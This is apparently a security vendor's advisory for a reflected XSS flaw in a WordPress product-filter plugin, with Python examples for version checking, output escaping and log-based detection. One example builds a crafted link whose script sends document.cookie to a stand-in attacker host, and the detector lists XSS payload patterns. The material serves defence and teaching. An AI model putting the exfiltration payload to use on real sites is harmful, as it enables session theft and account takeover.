HarborGuard Database

Severity: HIGH | CVE-2026-45437 | CNA: Patchstack

CVE-2026-45437: WordPress Product Filter Widget for Elementor plugin <= 1.0.6 - Cross Site Scripting (XSS) vulnerability

Unauthenticated Cross Site Scripting (XSS) in Product Filter Widget for Elementor <= 1.0.6 versions.

Metrics

CVSS v3.1 base score: 7.1
Severity: HIGH
Fixed in: no fixed version published
Affected products: 1


HarborGuard Analysis

Synopsis

A cross-site scripting (XSS) vulnerability affects the Product Filter Widget for Elementor WordPress plugin at version 1.0.6 and below. Patchstack classifies it as unauthenticated XSS; the CVSS vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L) says the flaw is reachable over the network without credentials but needs a victim to open a crafted link or page, which is the profile of a reflected XSS. Successful exploitation runs attacker-controlled JavaScript in the victim's browser in the context of the WordPress site, enabling session abuse, page content manipulation, and disruption of the affected page. HarborGuard is tracking this advisory and will make a patched-image rebuild available once an upstream fix is published.

HarborGuard Coverage

Detection: Available

Detection of CVE-2026-45437 is available across every HarborGuard environment: the CVE is ingested from upstream feeds including Patchstack within minutes of publication and matched against customer images, including custom-built images that bundle this plugin. No manual configuration is required for the scan to run.
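The match above comes down to reading the plugin's version out of the image and comparing it against the advisory's affected range (≤ 1.0.6). The following is an added example, not HarborGuard's scanner or the plugin's own code: it parses the standard WordPress plugin header comment from a constructed sample and compares versions numerically, because a naive string comparison would wrongly flag a hypothetical 1.0.10 as older than 1.0.6. The header text is made up for illustration; only the plugin name, author and version bound come from the advisory.

```python
import re

# Constructed sample: the header block a WordPress plugin's main PHP file carries.
# Plugin name, author and version come from the advisory; the rest is made up here.
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: Product Filter Widget for Elementor
 * Description: Adds a product filter widget to Elementor.
 * Version: 1.0.6
 * Author: Bhavin Thummar
 */
"""

# Upper bound of the affected range from the advisory ("<= 1.0.6").
MAX_AFFECTED_VERSION = "1.0.6"


def parse_plugin_header(text):
    """Return the Plugin Name and Version fields from a WordPress plugin header comment."""
    fields = {}
    for key in ("Plugin Name", "Version"):
        pattern = r"^\s*\*?\s*" + re.escape(key) + r"\s*:\s*(.+?)\s*$"
        m = re.search(pattern, text, re.MULTILINE | re.IGNORECASE)
        if m:
            fields[key] = m.group(1).strip()
    return fields


def version_key(version):
    """Split '1.0.10' into (1, 0, 10) so comparison is numeric, not lexical.

    Non-numeric pieces (e.g. 'beta' in '1.0.6-beta') sort below any number,
    so a pre-release of 1.0.6 is treated as older than 1.0.6 itself.
    """
    parts = []
    for piece in re.split(r"[.\-]", version.strip()):
        parts.append(int(piece) if piece.isdigit() else -1)
    return tuple(parts)


def compare_versions(a, b):
    """Return -1, 0 or 1 like a classic comparator; '1.0' and '1.0.0' compare equal."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += (0,) * (n - len(ka))
    kb += (0,) * (n - len(kb))
    return (ka > kb) - (ka < kb)


def is_affected(version, max_affected=MAX_AFFECTED_VERSION):
    """True when the installed version falls inside the advisory's affected range."""
    return compare_versions(version, max_affected) <= 0


def assess_plugin(header_text):
    """Parse a plugin header and report whether the bundled version is affected."""
    fields = parse_plugin_header(header_text)
    version = fields.get("Version", "")
    return {
        "name": fields.get("Plugin Name"),
        "version": version,
        "affected": bool(version) and is_affected(version),
    }


if __name__ == "__main__":
    print(assess_plugin(SAMPLE_PLUGIN_HEADER))
```

Once the plugin author publishes a fixed version, the check becomes a two-sided range (greater than 1.0.6 and below the fix) rather than the open upper bound used here.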
Triage: Available

HarborGuard is capable of scoring this CVE at its published CVSS v3.1 severity of 7.1 (HIGH) and weighting it against each environment's compliance policy to surface it at the appropriate priority. Routing to the correct team inbox within each customer org is handled automatically based on workload ownership mappings.
Patch: Pending upstream

Because no fix version has been published for CVE-2026-45437, HarborGuard re-checks the Patchstack advisory on every ingest cycle and will make a patched-image rebuild available the moment an upstream fix is released. For customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be triggered automatically at that point.

Exploit Conditions

  • Network reachability: Required

    The attacker must reach the WordPress site over the network; the plugin's vulnerable endpoint is exposed via standard HTTP/HTTPS (CVSS AV:N).

  • Authentication: Not required

    No account or credentials are needed; the vulnerability is exploitable by any unauthenticated visitor (CVSS PR:N).

  • Victim interaction: Required

    A victim must follow a crafted link or visit an attacker-controlled page that triggers the malicious payload, so social engineering is a necessary step (CVSS UI:R). The damage scales with who the victim is: a logged-in editor or administrator is far more valuable than an anonymous shopper.

  • Attack complexity: Low

    Attack complexity is low (CVSS AC:L): the exploit does not depend on race conditions, unusual site configuration, or information the attacker cannot obtain from the public site.

Blast Radius

  • Reads session cookies or authentication tokens from the victim's browser if the HttpOnly flag is absent, enabling account takeover. WordPress core sets its own authentication cookies with HttpOnly by default, so on a stock install the script cannot read them directly; custom cookies set by other plugins or themes may not be protected.
  • Injects attacker-controlled content into the page the victim is viewing, allowing credential-harvesting overlays or defacement.
  • Executes arbitrary JavaScript in the victim's browser session, enabling actions on the WordPress site on the victim's behalf. Because the script runs on the site's own origin, it can issue authenticated requests (including fetching the nonces the site's own forms use) without ever reading a cookie, which is the more realistic path to account takeover on a stock WordPress install.
  • Disrupts the rendered page's normal functionality, degrading the user experience for targeted visitors.
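To make the exploit conditions and blast radius above concrete, here is an added example that is not the plugin's code and not HarborGuard's: a hypothetical filter widget that reflects a query parameter into an HTML attribute, shown raw (vulnerable) and escaped for the attribute context (hardened, the equivalent of WordPress's esc_attr()). The parameter name filter_search, the shop URL and the attacker host are assumptions for illustration; the advisory does not name the vulnerable parameter.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed crafted link of the kind a victim would be lured into opening.
# The parameter name and hosts are assumptions, not taken from the advisory.
# Decoded, the parameter value is:  "><script>fetch('https://attacker.example/?'+document.cookie)</script>
CRAFTED_LINK = (
    "https://shop.example/products/"
    "?filter_search=%22%3E%3Cscript%3Efetch%28%27https%3A%2F%2Fattacker.example%2F%3F%27"
    "%2Bdocument.cookie%29%3C%2Fscript%3E"
)


def get_param(url, name):
    """Extract one query parameter the way the server sees it (percent-decoded)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_filter_vulnerable(term):
    """Vulnerable pattern: attacker-controlled input placed raw into an attribute value.

    The payload's leading '">' closes the value and the tag, and whatever follows
    becomes markup the browser executes.
    """
    return f'<input type="text" name="filter_search" value="{term}">'


def render_filter_hardened(term):
    """Hardened: escape for the HTML attribute context before interpolation.

    html.escape(..., quote=True) neutralises < > & " and ', so the input can never
    terminate the attribute. In a WordPress plugin this is esc_attr($term).
    """
    return f'<input type="text" name="filter_search" value="{html.escape(term, quote=True)}">'


def breaks_out_of_attribute(rendered):
    """Crude oracle: a raw '"><script' in the output means the attribute was terminated."""
    return '"><script' in rendered


if __name__ == "__main__":
    term = get_param(CRAFTED_LINK, "filter_search")
    print("vulnerable:", render_filter_vulnerable(term))
    print("hardened:  ", render_filter_hardened(term))
```

The sample payload exfiltrates document.cookie only to show the classic pattern; as noted above, WordPress's own auth cookies are HttpOnly, so a realistic payload would instead use the victim's session to issue same-origin requests. Escaping must match the output context: attribute values, element text, JavaScript strings and URLs each need a different encoder, and applying the wrong one leaves the hole open.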

How HarborGuard Handles This

Available on HarborGuard: scanning for CVE-2026-45437 is active across any environment whose images bundle the Product Filter Widget for Elementor plugin at version 1.0.6 or below. Because no upstream fix exists at this time, HarborGuard monitors the Patchstack advisory on every ingest cycle. As compensating controls until a patch is available, teams can consider: auditing plugin usage and disabling the filter widget on affected sites where it is not needed, which removes the exposure entirely; applying a web application firewall rule that blocks reflected script payloads in query parameters, bearing in mind that such rules are heuristics an attacker can probe around and should be treated as a stopgap; restricting network access to the WordPress site or to the paths that serve the widget where the site is not meant to be public, since an internal-only site cuts off the crafted-link delivery path; and adding a Content-Security-Policy that disallows inline scripts, which limits what a reflected payload can execute. The moment the plugin author (Bhavin Thummar) publishes a fixed version and Patchstack updates the advisory, HarborGuard will make a patched-image rebuild available; for customers who opt into auto-remediation, the rebuild, regression run, and PR against affected workloads will be initiated automatically.
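Whichever compensating control is chosen, the SOC will want to know whether anyone is probing the widget in the meantime. The following is an added example of such a detection, not HarborGuard's tooling and not a Patchstack rule: it walks constructed web-server access log lines in combined log format, percent-decodes each query string repeatedly so double-encoded payloads are not missed, and flags the classic reflected-XSS markers. The IPs, paths and parameter name are made up for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (combined log format). Hosts, paths and the
# filter_search parameter are made up; line 3 carries a double-encoded payload.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:12:00:01 +0000] "GET /shop/?filter_search=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2026:12:00:02 +0000] "GET /shop/?filter_search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5310 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2026:12:00:03 +0000] "GET /shop/?filter_search=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E HTTP/1.1" 200 5300 "-" "curl/8.0"
198.51.100.4 - - [10/Mar/2026:12:00:04 +0000] "GET /shop/?filter_search=red+shirt HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, ident, user, [timestamp], "METHOD target PROTO", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of a reflected-XSS probe once the query is decoded. Event handlers are
# listed explicitly rather than as on\w+= to keep benign parameters like button=1 quiet.
XSS_PATTERNS = re.compile(
    r"<\s*script\b"
    r"|<\s*(?:img|svg|iframe|object|embed)\b"
    r"|\bon(?:error|load|click|mouseover|focus|toggle)\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so %2522 -> %22 -> \" is caught; cap rounds to stay cheap."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_reflected_xss_probes(log_text):
    """Return one hit per request whose decoded query string carries an XSS marker."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        query = fully_decode(m.group("target").split("?", 1)[1])
        if XSS_PATTERNS.search(query):
            hits.append({"ip": m.group("ip"), "status": m.group("status"), "query": query})
    return hits


if __name__ == "__main__":
    for hit in find_reflected_xss_probes(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status tells you the request was served, not that the payload executed; pair it with the version check on the affected image to decide whether the probe landed on a vulnerable site. The patterns are a heuristic: attackers can use other tags and handlers, so treat misses as absence of evidence, not evidence of absence.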

Affected packages
  • Bhavin Thummar / Product Filter Widget for Elementor
    ≤ 1.0.6
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L